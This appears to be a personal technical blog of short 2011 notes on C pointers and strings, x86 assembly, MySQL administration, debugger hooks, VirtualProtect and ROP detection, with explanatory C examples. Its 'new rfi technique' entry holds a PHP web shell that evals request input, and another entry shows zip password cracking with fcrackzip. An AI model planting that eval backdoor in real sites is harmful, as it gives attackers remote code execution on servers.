29 April 2011

char array vs char pointer

#include <stdio.h>

int main(void) {
    char j2[100] = "adam:Aku darah anak malaysia";
    char *j3;

    j3 = j2;   /* the array name decays to a pointer to its first element */
    printf("&j2=%p j2=%p\n", (void *)&j2, (void *)j2);
    /* the original printed j3 with %x, which only shows the low 32 bits of a
       64-bit address (see the output below); %p is the correct conversion */
    printf("&j3=%p  j3=%p\n", (void *)&j3, (void *)j3);
    return 0;
}


>>:

&j2=0x7fff1b810fc0 j2=0x7fff1b810fc0
&j3=0x7fff1b810fb8  j3=1b810fc0



# compiled and run on a 64-bit OS.
&j2 is the same as j2 and j3.
&j3 is the location where the address of j2 is stored.
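An added example (not the original program) that turns the three observations above into checks: the same buffer and alias, with the address comparisons, the sizeof difference between array and pointer, and the 32-bit truncation that %x caused in the output above. The names j2/j3 are kept from the note; everything else is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed example: the same buffer and alias as in the note. */
static char j2[100] = "adam:Aku darah anak malaysia";
static char *j3 = j2;   /* j3 holds the address of j2[0] */

/* 1 when &j2, j2 and j3 all hold the same address: &j2 is a pointer to the
 * whole array, j2 decays to a pointer to its first element, and j3 was
 * assigned that decayed pointer. */
int same_address(void) {
    return (void *)&j2 == (void *)j2 && (void *)j2 == (void *)j3;
}

/* 1 when &j3 is a different location from &j2: j3 is its own variable that
 * merely stores j2's address (the second line of the output above). */
int pointer_has_own_storage(void) {
    return (void *)&j3 != (void *)&j2;
}

/* sizeof is where the two types visibly differ: the array reports all 100
 * bytes, the pointer only the size of an address (8 on a 64-bit OS). */
size_t array_size(void)   { return sizeof j2; }
size_t pointer_size(void) { return sizeof j3; }

/* Both names reach the same characters, so strlen agrees through either. */
size_t text_length(void)  { return strlen(j3); }

/* What %x did to the pointer in the note: the conversion takes an unsigned
 * int, so only the low 32 bits survive (1b810fc0 instead of 0x7fff1b810fc0). */
uint32_t low32(const void *p) { return (uint32_t)(uintptr_t)p; }

int main(void) {
    printf("&j2=%p j2=%p j3=%p &j3=%p\n", (void *)&j2, (void *)j2, (void *)j3, (void *)&j3);
    printf("sizeof j2=%zu sizeof j3=%zu strlen=%zu\n", array_size(), pointer_size(), text_length());
    printf("same_address=%d own_storage=%d low32(j3)=%08x\n",
           same_address(), pointer_has_own_storage(), low32(j3));
    return 0;
}
```

The point for review work: an array name cannot be reassigned (j2 = j3 does not compile) and sizeof on it gives the buffer size, while a char pointer passed into a function has lost both properties, which is why bounds must travel with it.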

28 April 2011

string.h (c)

1) strcmp
#include <string.h>

int bil = strcmp(strA, strB);   /* strA, strB are const char *, NUL-terminated */
if (bil == 0) {
    /* >> strA == strB (same bytes up to the NUL) */
}



2) strstr
#include <stdio.h>
#include <string.h>

const char *s1 = "amanamanam";
const char *s2 = "ana";
const char *s3;

s3 = strstr(s1, s2);   /* pointer to the first "ana" inside s1, or NULL if absent */
/* s3 - s1 is a ptrdiff_t (the index of the match); %td prints it directly,
   the cast to double with %f below is what produced "2.000000" */
printf("%p - %p = %f\n", (void *)s3, (void *)s1, (double)(s3 - s1));
>>>>0x40085e - 0x40085c = 2.000000
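An added example (not from the note) that wraps strcmp and strstr in checked helpers: the NULL result of strstr is handled before any pointer arithmetic, the match offset is returned as an index, overlapping matches are counted, and a bounded strncmp prefix test is included. Inputs are the note's strings plus constructed ones.

```c
#include <stdio.h>
#include <string.h>

/* Inputs: the note's haystack and needle (constructed examples otherwise). */
static const char *s1 = "amanamanam";
static const char *s2 = "ana";

/* strcmp returns 0 only when both strings match byte for byte up to the NUL;
 * the sign of a non-zero result tells which string sorts first. */
int same_string(const char *a, const char *b) { return strcmp(a, b) == 0; }

/* Bounded comparison: compares at most strlen(pre) bytes, so it works as a
 * prefix test without reading past the shorter string. */
int has_prefix(const char *s, const char *pre) { return strncmp(s, pre, strlen(pre)) == 0; }

/* Offset of the first occurrence of needle in haystack, or -1 if absent.
 * strstr returns NULL when there is no match, and subtracting or dereferencing
 * that NULL is undefined behaviour, so the check comes first. */
long find_offset(const char *haystack, const char *needle) {
    const char *hit = strstr(haystack, needle);
    if (hit == NULL) return -1;
    return (long)(hit - haystack);   /* pointer difference = index into haystack */
}

/* Count every (possibly overlapping) occurrence by resuming the search one
 * byte after each hit. */
int count_occurrences(const char *haystack, const char *needle) {
    int n = 0;
    const char *p = haystack;
    if (strlen(needle) == 0) return 0;        /* strstr("", ...) would match at every position */
    while ((p = strstr(p, needle)) != NULL) { n++; p += 1; }
    return n;
}

int main(void) {
    printf("strcmp(\"%s\",\"%s\") equal: %d\n", s1, s1, same_string(s1, s1));
    printf("has_prefix(\"%s\",\"aman\"): %d\n", s1, has_prefix(s1, "aman"));
    printf("offset of \"%s\" in \"%s\": %ld\n", s2, s1, find_offset(s1, s2));
    printf("occurrences of \"%s\": %d\n", s2, count_occurrences(s1, s2));
    printf("offset of a missing needle: %ld\n", find_offset(s1, "zzz"));
    return 0;
}
```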

26 April 2011

bit, byte, word

1 nibble = 4 bits
1 byte = 8 bits
1 word = 2 bytes = 16 bits
1 dword = 4 bytes = 32 bits


ps:/ every address in memory can hold 8 bits

retn

retn >> pop eip

retn 10 >> pop eip,
           >> add esp,10h

Example:
1- Start as below.

Before RETN 14 (address 76E0BFA9), ESP = 001BFA18.
RET 14 >>
- POP EIP
- ADD ESP, 14




2- As a result, EIP and ESP change.
- POP EIP causes ESP to become 001BFA1C.
- ADD ESP, 14 >>  ESP = 001BFA1C + 14 = 001BFA30
as below:

25 April 2011

jump if overflow

assembly:
jo > jump if overflow

But this is not a stack overflow. It refers to the overflow flag (O) in the CPU.
This flag is set if the result of the last arithmetic operation is too large to hold in the register.


[false alarm.]

mysql create user

GRANT ALL PRIVILEGES ON `dbName`.* TO 'mysqluser'@'localhost' WITH GRANT OPTION ;



Detail:
CREATE USER 'new-username'@'localhost' IDENTIFIED BY 'new-password';
GRANT ALL ON *.* TO 'new-username'@'localhost' WITH GRANT OPTION;



There is a list of privileges that you can grant to a user:
Privilege                Meaning
-----------------------  -------------------------------------------------------------
ALL [PRIVILEGES]         Sets all simple privileges except GRANT OPTION
ALTER                    Enables use of ALTER TABLE
CREATE                   Enables use of CREATE TABLE
CREATE TEMPORARY TABLES  Enables use of CREATE TEMPORARY TABLE
DELETE                   Enables use of DELETE
DROP                     Enables use of DROP TABLE
EXECUTE                  Not implemented
FILE                     Enables use of SELECT … INTO OUTFILE and LOAD DATA INFILE
INDEX                    Enables use of CREATE INDEX and DROP INDEX
INSERT                   Enables use of INSERT
LOCK TABLES              Enables use of LOCK TABLES on tables for which you have the SELECT privilege
PROCESS                  Enables the user to see all processes with SHOW PROCESSLIST
REFERENCES               Not implemented
RELOAD                   Enables use of FLUSH
REPLICATION CLIENT       Enables the user to ask where slave or master servers are
REPLICATION SLAVE        Needed for replication slaves (to read binary log events from the master)
SELECT                   Enables use of SELECT
SHOW DATABASES           SHOW DATABASES shows all databases
SHUTDOWN                 Enables use of MySQLadmin shutdown
SUPER                    Enables use of CHANGE MASTER, KILL, PURGE MASTER LOGS, and SET GLOBAL statements, the MySQLadmin debug command; allows you to connect (once) even if max_connections is reached
UPDATE                   Enables use of UPDATE
USAGE                    Synonym for "no privileges"
GRANT OPTION             Enables privileges to be granted


ref: http://stuntsnippets.com/mysql-create-new-user/

22 April 2011

pyHook

How to use pyHook in Immunity Debugger

1- Save the code below in the directory ~pathToImmunityDebugger\PyCommands\mhcubaHook.py
mhcubaHook.py

  • line 17-18: the hook name must be unique.


2- Open Immunity Debugger and File->Open any exe file.

3- Type !mhcubaHook and [enter] in the command box (at the bottom of I.D.). You will see the background colour at address 00401012 turn pink. This is because of the 'myhook.add(address)' call.

4- Press F9 (or Debug->Run)

5- Click the Window->Log menu to see the result

21 April 2011

recover deleted files

sudo dd if=/dev/mmcblk0p1 of=myCard.img bs=512

photorec myCard.img

ref: http://goinggnu.wordpress.com/2008/02/14/recover-deleted-files-from-memory-card/

20 April 2011

select into outfile


SELECT * INTO OUTFILE "/backup/books/allbooks.txt"
FIELDS TERMINATED BY '\t' LINES TERMINATED BY '\n'
FROM books;

ref:
http://www.mysqlfaqs.net/mysql-faqs/Data-Back-Up/Export-Data/How-to-use-SELECT-INTO-OUTFILE-statement-to-export-data

mysqldump without lock tables

mysqldump --lock-tables=false  -h komar.asia -u nama -ppassword database  > namaTable.sql

save mms stream

http://forum.videohelp.com/threads/257045-How-to-record-streaming-WMV-ASF-MMS-links-using-VLC-Media-Player

18 April 2011

reset joomla 1.6 admin password

replace the password field with:
 d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199


then log in using the password secret.

15 April 2011

codec library problem

suddenly the media player (vlc) no longer supports many formats. avidemux is the same; the formats it supports have become fewer.

below is how to fix the problem.

---------------------------------------
I just solved my vlc video problems. It appears that the culprit was the getdeb repository that I had recently added. I commented out that repo and downgraded several packages - libavcodec-extra-52, libavdevice-extra-52 etc. The most important one seems to be libva1.

In case anyone needs detailed version information for some packages, I will be happy to post.


----------------------------
Open synaptic, search ffmpeg, and remove all installed ffmpeg libraries, starting with libavcodec* down to libswscale*

You'll lose some players and a plugin or 2, no matter, they can be reinstalled. (in synaptic, file -> history will show you

Then install some players and libxine1-ffmpeg and see.


ref:http://ubuntuforums.org/archive/index.php/t-1544929.html

pfctl bsd

it's really hard to remember BSD.

pfctl -n -f /etc/pf.conf

cmp, jl, jg

cmp eax, 5
means: eax - 5 (only the flags are kept)


mov eax, 4
cmp eax, 5
; > je -> not taken
; > jl -> taken
; > jg -> not taken

mov eax, 4
cmp eax, 4
; > je -> taken
; > jl -> not taken
; > jg -> not taken

mov eax, 4
cmp eax, 3
; > je -> not taken
; > jl -> not taken
; > jg -> taken


Flag Register
Bit 6: Zero -->> if cmp 5,5 -->> Z flag = 1
Bit 7: Sign -->> negative sign, if cmp 1,2 -->> S flag = 1

14 April 2011

print a poster on A4 paper

ubuntu$ pdfposter -s 1  asal.pdf baru.pdf

asal.pdf is the large-format file, just one page.
baru.pdf is an A4-size file, but with many pages.

print baru.pdf and join the A4 sheets into one big poster

finding ROP (return-oriented programming)

1- stop whenever a 'retn' is hit
2- if the top 20 values on the stack point into an executable area of memory, there is most likely a ROP attempt.
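An added example, written for this post and not taken from any debugger, that models the two notes together: the RETN imm16 semantics from 26 April (POP EIP, then ADD ESP, imm16) on the ESP value quoted there, and the 20-dword heuristic above run over a constructed stack window against a constructed memory map. The stack contents, the return address 0x76E0C0DE and the region bounds are assumptions; only ESP = 001BFA18, RETN 14 and the address 76E0BFA9 come from the notes.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed model: a small 32-bit stack window and a memory map with one
 * executable region. Only the ESP/EIP values come from the note. */
#define STACK_BASE   0x001BFA00u
#define STACK_DWORDS 32

typedef struct { uint32_t esp, eip; } cpu_t;
typedef struct { uint32_t start, end; int executable; } region_t;

static uint32_t stack_mem[STACK_DWORDS];           /* dword i lives at STACK_BASE + 4*i */
static const region_t memmap[] = {
    { 0x00400000u, 0x00410000u, 0 },               /* assumed data region */
    { 0x76E00000u, 0x76F00000u, 1 },               /* assumed code region (R E) */
};

static uint32_t read_dword(uint32_t addr) { return stack_mem[(addr - STACK_BASE) / 4]; }
static void write_dword(uint32_t addr, uint32_t v) { stack_mem[(addr - STACK_BASE) / 4] = v; }

/* RETN imm16: POP EIP (ESP += 4), then ADD ESP, imm16 to drop the
 * caller-pushed arguments (stdcall cleanup). */
cpu_t retn(cpu_t c, uint16_t imm16) {
    c.eip = read_dword(c.esp);
    c.esp += 4 + imm16;
    return c;
}

static int is_executable(uint32_t addr) {
    for (size_t i = 0; i < sizeof memmap / sizeof memmap[0]; i++)
        if (addr >= memmap[i].start && addr < memmap[i].end) return memmap[i].executable;
    return 0;
}

/* The heuristic from the note: at a retn, look at the top n dwords of the
 * stack and count how many point into executable memory. A normal frame
 * holds mostly data and a return address or two; a ROP chain is almost
 * entirely code addresses. */
int count_code_pointers(uint32_t esp, int n) {
    int hits = 0;
    for (int i = 0; i < n; i++) {
        uint32_t addr = esp + 4u * (uint32_t)i;
        if (addr - STACK_BASE >= 4u * STACK_DWORDS) break;   /* stay inside the window */
        if (is_executable(read_dword(addr))) hits++;
    }
    return hits;
}

/* Scenario 1: ordinary stdcall return, ESP = 001BFA18 before RETN 14. */
cpu_t normal_return(void) {
    cpu_t c = { 0x001BFA18u, 0x76E0BFA9u };
    for (uint32_t i = 0; i < STACK_DWORDS; i++) write_dword(STACK_BASE + 4u * i, 1u + i); /* plain data */
    write_dword(c.esp, 0x76E0C0DEu);               /* assumed return address into code */
    return retn(c, 0x14);
}

int normal_hits(void) {
    normal_return();                               /* populate the window as in scenario 1 */
    return count_code_pointers(0x001BFA18u, 20);
}

/* Scenario 2: the same window filled with a run of code addresses. */
int rop_like_hits(void) {
    for (uint32_t i = 0; i < STACK_DWORDS; i++) write_dword(STACK_BASE + 4u * i, 0x76E01000u + 16u * i);
    return count_code_pointers(0x001BFA18u, 20);
}

int main(void) {
    cpu_t after = normal_return();
    printf("after RETN 14: EIP=%08X ESP=%08X\n", after.eip, after.esp);
    printf("normal frame:   %d/20 code pointers\n", normal_hits());
    printf("ROP-like frame: %d/20 code pointers\n", rop_like_hits());
    return 0;
}
```

The count is a heuristic, not proof: frames of deeply nested calls or tables of function pointers also raise it, so in practice the threshold is tuned per program and a hit is a prompt to inspect the chain, not a verdict.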

new rfi technique

<?php
if(isset($_REQUEST["code_str"])){
eval(stripslashes($_REQUEST["code_str"]));
} else {
exit(999 * 4 . " The Roof Is On Fire");
}
?>

13 April 2011

pin what???

I think pin (http://www.pintool.org/) can replace hooking.

An example use is logging every opcode instruction that the process executes.

Another alternative is DynamoRIO (http://groups.csail.mit.edu/cag/dynamorio/)


ref: http://blog.zynamics.com/2010/07/28/dumping-shellcode-with-pin/

cracking a zip file with fcrackzip

$ zip --encrypt -r secret secret/
(creating secret.zip)


$ fcrackzip -u -c a -p aaaaa secret.zip
PASSWORD FOUND!!!!: pw == linux


ref http://linuxers.org/article/how-crack-zip-file-passwords-linux-using-fcrackzip

12 April 2011

every address holds 8 bits

every address in memory can hold 8 bits.

eg:
address            value (in hexadecimal)
---------------   -------------
0x00102000: 41 44
0x00102001: 41 20
0x00102002: 42 41  43 41
0x00102004: 00

  • [1- for dummies: why is 0x00102003 not listed above?]
  • [2- if char *str = 0x102000, what does printf("%s", str) give?]



4 bits can hold 16 different values
in hexadecimal    0x0 - 0xF

8 bits (1 byte) >> 0x00 - 0xFF
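An added example, not from the notes, that covers this entry and the bit/byte/word one from 26 April: a constructed buffer is dumped one address per byte the way a debugger shows it, each byte is split into its two nibbles, consecutive bytes are assembled into a little-endian word and dword, and strlen/printf("%s") show where the run of addresses ends (the 0 byte). The buffer contents are made up for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed buffer: the bytes 'A','D','A',' ','B','A','C','A' followed by 0. */
static const unsigned char sample[] = "ADA BACA";

/* Every address names exactly one byte (8 bits), so a string of n characters
 * occupies n+1 consecutive addresses, the last one holding the 0 terminator. */
size_t bytes_occupied(const char *s) { return strlen(s) + 1; }

/* Split a byte into its two nibbles (4 bits each, range 0x0 - 0xF). */
unsigned high_nibble(unsigned char b) { return b >> 4; }
unsigned low_nibble(unsigned char b)  { return b & 0x0F; }

/* Assemble a word (2 bytes) and a dword (4 bytes) from consecutive addresses,
 * little-endian as x86 stores them: the lowest address is the low byte. */
uint16_t read_word_le(const unsigned char *p)  { return (uint16_t)(p[0] | (p[1] << 8)); }
uint32_t read_dword_le(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* One row per address, as a debugger's memory dump does. */
void dump(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        printf("%p: %02X  '%c'\n", (const void *)(p + i), p[i], p[i] ? p[i] : '.');
}

int main(void) {
    dump(sample, sizeof sample);
    printf("occupies %zu bytes (8 characters + the 0 terminator)\n", bytes_occupied((const char *)sample));
    printf("0x41 -> nibbles %X %X\n", high_nibble(0x41), low_nibble(0x41));
    printf("word at +0: %04X  dword at +0: %08X\n", read_word_le(sample), read_dword_le(sample));
    printf("printf(\"%%s\") reads forward until the first 0 byte: \"%s\"\n", (const char *)sample);
    return 0;
}
```

The last line is the answer to question 2 above in general form: %s keeps reading consecutive addresses until it meets a 0 byte, so a buffer without one makes it run past the intended data.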

11 April 2011

cmp (opcode)

cmp eax, ebx
>>
eax - ebx = y
if y == 0, ZF = 1 (True)
if y != 0, ZF = 0 (False)

Assembly Leave Retn

LEAVE =>  POP EBP

RETN =>  POP EIP

VirtualProtect

In Immunity Debugger -> Memory Map

Before
Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=R E
 Initial access=RWE



Call VirtualProtect API
0040F253  |. 50             PUSH EAX                                          ; /pOldProtect
0040F254  |. 6A 40          PUSH 40                                           ; |NewProtect = PAGE_EXECUTE_READWRITE
0040F256  |. 52             PUSH EDX                                          ; |Size
0040F257  |. 68 00104000    PUSH setup279.00401000                            ; |Address = setup279.00401000
0040F25C  |. E8 1F000000    CALL <JMP.&kernel32.VirtualProtect>               ; \VirtualProtect


Result

Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=RWE CopyOnWr
 Initial access=RWE


The Access field changes from [R E] to [RWE CopyOnWr]

07 April 2011

Bismillah

Begun in the name of Allah, the Most Gracious, the Most Merciful.
And blessings and peace upon the Prophet Muhammad (SAW)